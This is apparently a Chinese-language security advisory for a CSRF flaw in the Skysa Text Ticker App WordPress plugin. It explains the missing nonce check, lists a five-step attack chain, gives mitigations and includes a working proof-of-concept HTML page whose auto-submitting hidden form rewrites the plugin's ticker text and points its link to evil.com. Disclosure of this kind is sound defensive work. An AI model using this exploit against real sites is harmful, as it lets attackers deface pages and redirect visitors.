CVE-2026-6710 WordPress Skysa插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2026-6710

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Skysa Text Ticker App (WordPress Plugin)

漏洞概述

WordPress的Skysa Text Ticker App插件在所有版本（包括1.4及以下）中存在跨站请求伪造（CSRF）漏洞。该漏洞是由于SkysaApps_Admin_AppPage函数中缺少或错误的nonce验证导致的。未经身份验证的攻击者可以利用此漏洞，诱骗站点管理员点击恶意链接，从而伪造跨站请求。一旦管理员触发，攻击者即可修改插件的设置，包括滚动消息文本和URL，进而篡改网站显示内容。

技术细节

该漏洞的根本原因是WordPress插件在处理敏感操作时未遵循安全开发规范，即在`SkysaApps_Admin_AppPage`函数中缺少对CSRF令牌（nonce）的验证。在WordPress生态系统中，nonce是区分合法用户请求和伪造请求的关键机制。攻击者可以构建一个恶意的HTML页面，其中包含一个隐藏的表单，该表单的action指向目标WordPress站点的插件设置更新接口，并填充了恶意的参数（如修改后的文本和URL）。当已登录的管理员访问此恶意页面时，浏览器会自动携带管理员的Session Cookie发送请求。由于服务端未验证nonce，该请求被接受，导致插件配置被恶意篡改。此漏洞利用不需要攻击者获取管理员的凭据，仅需社会工程学诱导。

攻击链分析

STEP 1

侦查

攻击者识别出目标WordPress站点安装了受影响版本的Skysa Text Ticker App插件。

STEP 2

构造载荷

攻击者编写一个HTML页面，包含自动提交的表单，表单数据指向插件设置修改接口，并带有恶意参数（如篡改后的文本）。

STEP 3

投递诱饵

攻击者通过电子邮件或即时通讯工具，将包含恶意链接的页面发送给目标站点的管理员。

STEP 4

执行利用

管理员在保持登录状态的情况下点击链接或访问页面，浏览器自动发送带有认证Cookie的伪造请求。

STEP 5

达成效果

服务器端因缺少Nonce验证而接受请求，插件设置被修改，滚动文本被篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2026-6710 -->
<!-- Save this as exploit.html and trick the admin to click -->
<html>
<body>
  <h1>Loading...</h1>
  <form action="http://target-site.com/wp-admin/admin.php?page=skysa_text_ticker_app" method="POST">
    <input type="hidden" name="skysa_text_ticker_message" value="Hacked by CSRF">
    <input type="hidden" name="skysa_text_ticker_url" value="http://evil.com">
    <!-- Other plugin specific fields might be required -->
  </form>
  <script>
    document.forms[0].submit();
  </script>
</body>
</html>

影响范围

Skysa Text Ticker App <= 1.4

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Skysa Text Ticker App插件以消除风险。同时，管理员应提高安全意识，不要轻易点击来源不明的链接，尤其是在登录网站后台的状态下。定期检查网站前端显示内容，确保未被篡改。